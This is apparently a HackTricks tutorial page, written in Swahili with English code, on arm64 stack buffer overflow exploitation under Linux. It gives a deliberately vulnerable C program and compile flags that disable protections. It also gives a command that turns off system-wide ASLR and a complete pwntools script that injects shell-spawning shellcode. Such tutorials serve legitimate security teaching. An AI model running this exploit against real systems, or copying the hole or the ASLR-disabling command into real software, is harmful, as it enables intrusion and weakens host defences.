2.1 KiB
Stack Shellcode - arm64
{{#include ../../../banners/hacktricks-training.md}}
Pata utangulizi kuhusu arm64 katika:
{{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}
Linux
Code
#include <stdio.h>
#include <unistd.h>
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
Kompaili bila pie, canary na nx:
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
Hakuna ASLR & Hakuna canary - Stack Overflow
Ili kuzima ASLR tekeleza:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Ili kupata offset ya bof angalia kiungo hiki.
Exploit:
from pwn import *
# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Start the process
p = process(binary_name)
# Offset to return address
offset = 72
# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)
# Craft the payload
payload = b'A' * offset + ret_address + shellcode
print("Payload length: "+ str(len(payload)))
# Send the payload
p.send(payload)
# Drop to an interactive session
p.interactive()
Jambo pekee "ngumu" la kupata hapa ni anwani kwenye stack ya kuitwa. Katika kesi yangu nilitengeneza exploit kwa kutumia anwani niliyopata kwa gdb, lakini wakati wa kui-exploit haikufanya kazi (kwa sababu anwani ya stack ilibadilika kidogo).
Nilifungua generated core file (gdb ./bog ./core) na kukagua anwani halisi ya mwanzo wa shellcode.
macOS
Tip
Hawezekani kuzima NX kwenye macOS kwa sababu kwenye arm64 modi hii imetekelezwa kwenye ngazi ya hardware, hivyo hutaweza kuizima — hivyo hautapata mifano yenye shellcode kwenye stack kwenye macOS.
Angalia mfano wa macOS ret2win katika:
{{#ref}} ../ret2win/ret2win-arm64.md {{#endref}}
{{#include ../../../banners/hacktricks-training.md}}